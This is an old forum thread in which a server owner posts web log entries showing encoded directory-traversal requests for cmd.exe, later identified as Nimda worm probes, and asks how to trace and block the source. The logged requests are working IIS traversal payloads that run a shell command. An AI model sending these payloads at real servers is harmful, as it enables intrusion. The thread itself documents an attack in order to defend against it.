#1
Prospect
Join Date: Feb 2002
Location: East Coast
Posts: 22
Is there a way to track IP addys that fail an nslookup?
Hey all,
I've had some troubling connections from a single domain (155.230.x.x), actually it was a bit ago, but I just noticed all the 404s in my logs. It seems to me like a scriptkiddie was trying to break into my WindowsNT server. Luckily, I was running OS X on it. Here's a sample:

155.230.14.11 - - [26/Feb/2002:03:00:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:03 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311

I'm assuming that this individual was checking to see if my webserver was vulnerable to some msxploit...apparently one that would give them access to my C: drive (joke's on them...for a few separate reasons, as we know). Anyway, actually 2 questions. One, I would like to report the individual in question to their ISP (I'm assuming from the pattern of connections that they were dialed in via PPP)...but the reverse lookup failed, so I don't know how to go further in trying to track down the sysadmin. Secondly, is there a way to deny access to this domain? Is that even worth bothering with? Thanks, ill.
__________________
=========================== http://illovich.com
#2
Prospect
Join Date: Jan 2002
Posts: 36
The easiest way to get the owner of the IP address is to lookup the netblock owner of the IP. There is a wonderful site: Geektool's Whois Proxy. Just copy/paste the IP into their proxy and hit the whois button and it will spit back the information.
Looks like the IP 155.230.14.11 is owned by Kyungpook National University. The contact email address listed is: staff@bh.knu.ac.kr
#3
Prospect
Join Date: Feb 2002
Location: East Coast
Posts: 22
Cool, thanks for the tip.
BTW, to anybody who didn't recognize the burst above: a very nice system admin told me that that burst of requests is the Nimda virus, out there in netland poking around. And here I thought it was a scriptkiddy.
__________________
=========================== http://illovich.com